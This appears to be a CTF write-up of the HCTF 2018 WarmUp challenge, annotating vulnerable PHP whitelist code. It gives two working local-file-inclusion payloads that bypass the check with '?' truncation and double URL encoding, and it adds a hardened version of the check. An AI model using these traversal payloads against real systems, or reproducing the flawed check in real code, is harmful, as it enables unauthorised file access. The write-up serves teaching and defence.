buuctf web [HCTF 2018]WarmUp

BUUCTF practice range: https://buuoj.cn/


Opening the challenge shows a large picture of a face.

Viewing the page source reveals a comment that points to source.php.

Visiting source.php shows the following source code, annotated here:

    <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; // $whitelist holds the two allowed file names
            if (! isset($page) || !is_string($page)) {
                // check that $page is set and is a string
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                // exact match against $whitelist; obviously we cannot return here, because the flag we want
                // is not in either of these two files, but the check can still be bypassed, as explained in detail below
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page. '?', '?') // position of the first '?' in the string
            );
            // take the substring from the start up to the '?' and store it in $_page
            // obviously this is where the check can be bypassed to get the flag

            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page); // none of the above matched, so URL-decode once first
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            ); // after decoding, again take the substring up to the '?' and store it in $_page
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file']) // check that the file parameter exists
        && is_string($_REQUEST['file']) // check that file is a string
        && emmm::checkFile($_REQUEST['file']) // pass file to checkFile in class emmm
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }
    ?>

Including hint.php gives a hint: the flag is in the file ffffllllaaaagggg.


Analyzing the code above, there are two ways to bypass the check. The root problem is that only a truncated prefix of the user-controlled value is compared against the whitelist, while the complete value is what gets passed to include.

1. The first mb_substr check can be bypassed to obtain the flag. We only need to append a ? after source.php: the truncated string source.php is assigned to $_page and passes the whitelist check, and the part after the ? uses ../ to climb to the parent directories and include the flag file.

payload:

source.php?file=source.php?/../../../../ffffllllaaaagggg


2. The second mb_substr (the one after urldecode) can also be bypassed.

payload:

/source.php?file=source.php%253f/../../../../../ffffllllaaaagggg
  1. %25 URL-decodes to a percent sign (%), and %3f URL-decodes to a question mark (?).
  2. The browser decodes the URL once for us, turning %25 into %.
  3. The value is then passed into the PHP code, where the urldecode call decodes %3f into a question mark (?), so the second truncation again yields source.php.
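To see both bypasses and the fix side by side, here is an added example that is not code from the original write-up or the challenge: the whitelist logic of checkFile() reduced to a pure function, next to a hardened version, run against the two payloads above. Assumptions: the whitelist is the challenge's own; the second payload is given as PHP receives it in $_REQUEST (the %25 in the URL already decoded once to %); the demo directory and its two files are created by the script itself; the mbstring extension is available.

```php
<?php
// Added example, not code from the original write-up or the challenge.
// Assumptions: whitelist taken from the challenge; payload 2 given as PHP
// sees it after one URL decode; demo directory/files constructed here.

$whitelist = ["source" => "source.php", "hint" => "hint.php"];

// Original logic: a *prefix* of the value (cut at the first '?', before and
// after one urldecode) is checked, but the whole value is what gets included.
function checkFileOriginal(string $page, array $whitelist): bool
{
    if (in_array($page, $whitelist)) {
        return true;
    }
    $_page = mb_substr($page, 0, mb_strpos($page . '?', '?'));
    if (in_array($_page, $whitelist)) {
        return true;
    }
    $_page = urldecode($page);
    $_page = mb_substr($_page, 0, mb_strpos($_page . '?', '?'));
    return in_array($_page, $whitelist);
}

// Hardened logic: the complete value must equal a whitelist entry (no
// truncation, no decoding), and the resolved path must still lie inside the
// directory holding the allowed files, so '../' can never escape it.
function checkFileHardened(string $page, array $whitelist, string $baseDir): bool
{
    if (!in_array($page, $whitelist, true)) {
        return false;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $page);
    if ($base === false || $real === false) {
        return false;
    }
    return strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
}

// Constructed demo directory containing the two whitelisted files.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'warmup_demo';
if (!is_dir($baseDir)) {
    mkdir($baseDir);
}
touch($baseDir . DIRECTORY_SEPARATOR . 'source.php');
touch($baseDir . DIRECTORY_SEPARATOR . 'hint.php');

$inputs = [
    'source.php',                                     // legitimate
    'hint.php',                                       // legitimate
    'source.php?/../../../../ffffllllaaaagggg',       // payload 1 from the write-up
    'source.php%3f/../../../../../ffffllllaaaagggg',  // payload 2, after one decode
    '../hint.php',                                    // plain traversal, no '?'
];

// Expected: the original check passes both payloads, the hardened check
// passes only the two exact whitelist names.
foreach ($inputs as $file) {
    printf("%-48s original: %-4s hardened: %s\n",
        $file,
        checkFileOriginal($file, $whitelist) ? 'pass' : 'deny',
        checkFileHardened($file, $whitelist, $baseDir) ? 'pass' : 'deny');
}
```

Run it with the PHP CLI (for example php warmup_check.php, an assumed file name). The hardened version deliberately does no decoding or truncation of its own: whatever string reaches in_array is exactly the string that would reach include, and the realpath comparison is defence in depth in case the whitelist ever grows to contain a path with a directory component.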


This challenge is similar to the vulnerability CVE-2018-12613.

Origin blog.csdn.net/weixin_41924764/article/details/109616580